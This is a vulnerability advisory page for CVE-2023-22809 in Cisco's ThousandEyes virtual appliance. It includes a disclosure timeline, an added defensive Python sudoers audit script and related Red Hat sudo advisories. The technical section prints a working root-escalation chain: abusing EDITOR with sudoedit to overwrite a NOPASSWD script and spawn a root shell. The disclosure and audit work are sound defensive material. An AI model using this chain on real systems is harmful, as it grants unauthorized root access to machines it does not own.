Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification

Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 suffers from an unpatched vulnerability in sudoedit, allowed by sudo configuration, which permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root.

Packet Storm
KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit

Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit
Advisory ID: KL-001-2023-003
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt

1. Vulnerability Details

     Affected Vendor: ThousandEyes
     Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
     Affected Version: thousandeyes-va-64-18.04 0.218
     Platform: Linux / Ubuntu 18.04
     CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component
     CVE ID: CVE-2023-22809

2. Vulnerability Description

     An unpatched vulnerability in 'sudoedit', allowed by sudo
     configuration, permits a low-privilege user to modify arbitrary
     files as root and subsequently execute arbitrary commands as
     root.

3. Technical Description

     The ThousandEyes Virtual Appliance is distributed with a
     restrictive set of commands that can be executed via sudo,
     without having to provide the password for the 'thousandeyes'
     account. However, the ability to execute sudoedit of a specific
     file (/etc/hosts) via sudo is permitted without requiring the
     password. The sudoedit binary can be abused to allow the
     modification of any file on the filesystem. This is a known
     security vulnerability (per https://seclists.org/oss-sec/2023/q1/42),
     but had not been disclosed for the ThousandEyes Virtual Appliance.
     This can be abused to allow root-level compromise of the virtual
     appliance.

     thousandeyes@thousandeyes-va:~$ id
     uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
     thousandeyes@thousandeyes-va:~$ sudo -l
     Matching Defaults entries for thousandeyes on thousandeyes-va:
         env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

     User thousandeyes may run the following commands on thousandeyes-va:
         (ALL : ALL) ALL
         (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
             te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
             te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
             /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
             te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
         (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

     Here we see that /usr/local/bin/te-* are executable as root with no
     password. Even though sudoedit is only permitted to edit /etc/hosts,
     we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one
     of those scripts because we can then execute it:

     thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
     /usr/local/bin/te-set-config: Python script, ASCII text executable
     thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
     sudoedit: --: editing files in a writable directory is not permitted
     2 files to edit
     sudoedit: /etc/hosts unchanged
     thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
     /usr/local/bin/te-set-config: ASCII text
     thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
     /bin/bash
     thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
     root@thousandeyes-va:~# id
     uid=0(root) gid=0(root) groups=0(root)
     root@thousandeyes-va:~#

4. Mitigation and Remediation Recommendation

     The vendor has released a version which remediates the described
     vulnerability. Release notes are available at:
     https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994

5. Credit

     This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

6. Disclosure Timeline

     2023.04.26 - KoreLogic submits vulnerability details to Cisco.
     2023.04.26 - Cisco acknowledges receipt and the intention to
                  investigate.
     2023.05.04 - Cisco notifies KoreLogic that a remediation for this
                  vulnerability is expected to be available within
                  90 days.
     2023.06.30 - 45 business days have elapsed since KoreLogic reported
                  this vulnerability to the vendor.
     2023.07.11 - Cisco informs KoreLogic that the issue has been
                  remediated in the latest ThousandEyes Virtual
                  Appliance and a Third Party Software Release Note
                  Enclosure will be released 2023.08.16. Cisco
                  provides CVE-2023-22809 to track this vulnerability.
     2023.07.24 - 60 business days have elapsed since KoreLogic reported
                  this vulnerability to the vendor.
     2023.08.16 - Cisco public acknowledgement.
     2023.08.17 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.

The contents of this advisory are copyright (c) 2023 KoreLogic, Inc.
and are licensed under a Creative Commons Attribution Share-Alike 4.0
(United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We
are also developers of various tools and resources aimed at helping the
security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
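A policy audit written around this advisory (an added example, not KoreLogic's or Cisco's code): it parses a constructed sudoers fragment shaped like the appliance's sudo -l output and flags sudoedit rules on a sudo older than 1.9.12p2 that lack the sudo project's env_delete workaround, plus wildcard command paths such as /usr/local/bin/te-* that let a root-level file write become root command execution. The sudo version string passed in is a constructed input, not a value taken from the advisory.

```python
import re

# Constructed sudoers fragment mirroring the appliance's "sudo -l" output above.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
thousandeyes ALL=(ALL:ALL) ALL
thousandeyes ALL=(ALL) NOPASSWD: /bin/systemctl status te-va, sudoedit /etc/hosts, /usr/bin/te-*, /usr/local/bin/te-*
thousandeyes ALL=(root) NOPASSWD: /usr/sbin/tcpdump
"""

FIXED = (1, 9, 12, 2)   # sudo 1.9.12p2 is the first release with the sudoedit fix


def parse_version(text):
    """'1.8.21p2' -> (1, 8, 21, 2); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups())


def audit(sudoers, sudo_version):
    """Return (finding, user, command) tuples for the two risks the advisory chains."""
    rules = [l.strip() for l in sudoers.splitlines()
             if l.strip() and not l.lstrip().startswith("#")]
    # The sudo project's documented workaround strips the editor variables for sudoedit rules.
    workaround = any(re.search(r'Defaults!SUDOEDIT\s+env_delete\+?=.*EDITOR', r) for r in rules)
    exposed = parse_version(sudo_version) < FIXED and not workaround
    findings = []
    for rule in rules:
        # user host=(runas) [NOPASSWD:] cmd, cmd, ...
        m = re.match(r"(\S+)\s+\S+=\([^)]*\)\s*(?:(?:NO)?PASSWD:)?\s*(.*)", rule)
        if not m:
            continue
        user, cmds = m.groups()
        for cmd in (c.strip() for c in cmds.split(",")):
            if not cmd:
                continue
            if cmd.startswith("sudoedit") and exposed:
                findings.append(("CVE-2023-22809", user, cmd))
            # A glob in the command path means a file written via sudoedit can be run as root.
            if "*" in cmd.split()[0]:
                findings.append(("wildcard-command", user, cmd))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS, "1.8.21p2"):   # version is a constructed input
        print(*finding)
```

Pointing `audit()` at the real /etc/sudoers plus /etc/sudoers.d fragments and the output of `sudo -V` gives the same check on a live host.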

Related news

CVE-2023-0041: IBM Security Guardium is affected by multiple vulnerabilities (CVE-2023-22809, CVE-2019-12490, CVE-2013-0041)

RHSA-2023:3276: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: A vulnerability was found in sudo. Exposure in how sudoedit handles user-provided environment variables leads to arbitrary file writing with privileges of the RunAs user (usually root). The prereq...

RHSA-2023:3262: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: A vulnerability was found in sudo. Exposure in how sudoedit handles user-provided environment variables leads to arbitrary file writing with privileges of the RunAs user (usually root). The prerequisite for exploitation is that the current user must be authorized by the sudoers policy to edit a file using sudoedit.

Red Hat Security Advisory 2023-0291-01

Red Hat Security Advisory 2023-0291-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0280-01

Red Hat Security Advisory 2023-0280-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0282-01

Red Hat Security Advisory 2023-0282-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0292-01

Red Hat Security Advisory 2023-0292-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

RHSA-2023:0292: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0282: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0280: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user